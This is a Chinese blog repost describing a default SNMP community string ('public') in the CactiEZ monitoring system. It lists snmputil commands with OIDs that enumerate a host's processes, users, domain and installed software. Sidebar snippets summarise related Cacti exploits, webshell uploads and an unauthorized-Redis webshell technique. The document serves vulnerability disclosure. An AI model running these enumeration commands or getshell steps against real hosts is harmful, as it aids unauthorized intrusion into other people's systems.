CactiEZ 中文版snmp默认团体名漏洞

最新推荐文章于 2024-05-14 17:34:48 发布
最新推荐文章于 2024-05-14 17:34:48 发布
阅读量1.7k 收藏
点赞数
分类专栏: 漏洞列表 渗透

http://www.freebuf.com/vuls/3208.html

这个漏洞真强大啊,虽然是信息搜集,但是把服务器上的所有软甲和版本号都直接给你了 ...

佩服,实在是佩服,这个功能的实现者 ...

CactiEZ 中文版,是一款监控控制系统;其中默认的snmp设置public,没有修改导致可以远程读取目标设备主机信息。

如:

snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.25.4.2.1.2   //**进程列表

snmputil.exe walk 127.0.0.1 public .1.3.6.1.4.77.1.2.25.1.1   //**用户列表

snmputil.exe get 127.0.0.1 public .1.3.6.1.4.77.1.4.1.0   //**域名

snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.25.6.3.1.2   //**安装的软件

snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.1   //**系统信息
PD_3569
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Cactiez中文版v10安装教程归纳.pdf
02-15
CactiEZ中文版v10是一款专为网络监控设计的简化版Linux发行版,它包含Cacti网络监控工具的预配置环境。本教程将详细介绍CactiEZ的安装、配置、登陆以及被监控端的配置过程。 一、安装CactiEZ 1. 首先,从光盘启动...
CactiEZ weathermap插件任意文件写入
m0_49025459的博客
01-17 1358
CactiEZ的登录界面,大多数都会存在weathermap的插件,这样我们就可以尝试该网站是否存在任意文件写入漏洞了。
Cacti命令执行漏洞分析 (CVE-2022-46169)
whoami
12-07 4020
Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。在本漏洞中,攻击者可通过控制由get_nfilter_request_var()函数检索的参数$poller_id,以及构造local_data_ids参数,满足poller_item =POLLER_ACTION_SCRIPT_PHP条件,触发proc_open()函数,从而导致命令执行。Cacti < 1.2.23从漏洞补丁可以看出,本次漏洞点主要存在于lib/functions.php、remote_age
严重的Cacti漏洞可导致攻击者执行远程代码
最新发布
smellycat000的专栏
05-14 146
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士广泛使用的网络监控工具 Cacti 最近发布重要安全更新,修复了一系列漏洞,其中最严重的是CVE-2024-25641,CVSS评分为9.1。严重的RCE漏洞CVE-2024-25641可导致拥有“导入模板”权限的认证用户在托管 Cacti 应用的服务器上执行任意PHP代码。该漏洞是因为对函数 import_package() 中所上传的 XML...
利用cacticg getshell
m0_46689007的博客
11-29 704
获得用户密码,admin密码MD5解码失败,改写admin密码为123456,结束后再将密码改回去。扫描目录发现有phpmyadmin,存在弱口令root/root。通过更改前端type参数为text,泄露邮箱账号和密码。发现存在weathermap插件任意文件写入漏洞。再查看8980端口发现为cactize服务。查看7025端口为机房后台,弱口令没进去。登录后,没有找到getshell的地方。先用 Nmap扫描ip端口开放情况。蚁剑连接getshell。上传webshell。
Cacti1.2.16最新版安装和配置(Shell一键安装)
运维密码
12-05 1706
一、Cacti一键安装脚本介绍 如果你对系统操作不是很熟悉,刚开始安装这种软件可能会比较麻烦,手动安装各个步骤一不小心经常出错,但是出于为了熟悉环境,还是建议手动安装一次两次,这样可以熟悉各个组件的安装和配置。 二、环境要求 Centos 7.x以上,网络正常 PHP 7.x以上 MariaDB或者Mysql5.7版本以上 三、使用 脚本下载(左下角扫码公众号回复:Cacti安装脚本 获取...
Cactiez中文版v10安装教程实用.pdf
03-03
CactiEZ中文版v10是一款专为网络监控设计的简化版Cacti系统,它基于Red Hat Linux,提供了一种快速安装和配置网络监控的解决方案。本教程将指导你完成CactiEZ的安装、配置以及登陆,并介绍如何在被监控端进行必要的...
中文cactiez基于snmp监控管理软件
12-16
#CactiEZ v10.1 install text cdrom mediacheck lang en_US.UTF-8 keyboard us rootpw CactiEZ firewall --service=ssh --service=snmp --service=http authconfig --enableshadow --passalgo=sha512 --...
Linux下实现SNMP一键安装的Shell脚本
09-15
主要介绍了Linux下实现SNMP一键安装的Shell脚本,非常实用,需要的朋友可以参考下
CactiEZ图形化监控工具10.1版本64位(一键安装)
07-14
CactiEZ图形化监控工具10.1版本64位
Cacti命令执行漏洞复现(CVE-2022-46169)
0xSec
02-02 3882
Cacti项目是一个开源平台,可为用户提供强大且可扩展的操作监控和故障管理框架。在1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。漏洞编号:CVE-2022-46169,漏洞等级:严重。
CactiEZ10.1 不出图诡异故障排查
weixin_34194359的博客
03-14 468
在公司部署了一套CactiEZ用于实时监控多个网络设备的工作状态,设置了阈值和宕机短信报警,异常发生时系统会自动给自己的手机发送短信提醒,但有一台SSG按照正常方式添加监控主机后,在图形当中始终无法出图、无数据显示。然而另外一台相同配置、相同型号的设备却能够正常出图。后来在网友“摩子”的协助下解决了这个问题,做一个记录以备以后查阅 故障主机截图: Realti...
snmp使用默认团体_CactiEZ 中文版snmp默认团体
weixin_42476912的博客
12-23 1055
漏洞概要缺陷编号:WooYun-2012-07862漏洞标题:CactiEZ 中文版snmp默认团体相关厂商:CactiEZ 中文版漏洞作者:南国利剑提交时间:2012-06-05 12:50公开时间:2012-06-05 12:50漏洞类型:重要敏感信息泄露危害等级:低自评Rank:2漏洞状态:未联系到厂商或者厂商积极忽略Tags标签:漏洞详情披露状态:2012-06-05: 积极联系厂商并且...
利用未授权的redis写webshell
weixin_34008805的博客
11-15 143
最近redis的话题比较多,因此就有了下面这个故事。目标IP:210.73.90.xxx利用漏洞:未授权的redis访问漏洞利用1:1)本地生成秘钥root@GanDolf:~#ssh-keygen-trsa2)将公钥写入一个文件root@GanDolf:~#cd/root/.ssh/root@GanDolf:~/.ssh#(echo-e"\n\n";ca...
监控--CactiEZ使用
11-09 2149
CactiEZ安装:把CactiEZ系统装上,修改IP,重启network,页面访问 http://ip/ admin/admin 重设密码,登录! CactiEZ的中被监控主机操作步骤:(linux主机) 安装 yum -y install net-snmp yum -y install net-snmp-util* 修改snmp配置文件 vim /et
CactiEZ V10.1中文版快速部署与监控指南
"CactiEZ V10.1中文版是一个简化Cacti配置的集成化操作系统,基于CentOS 6.0,提供全中文界面和丰富的监控功能,包括网络性能监控、邮件报警和声音报警。它整合了Spine、RRDTool、Thold、Monitor等工具,并支持多种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值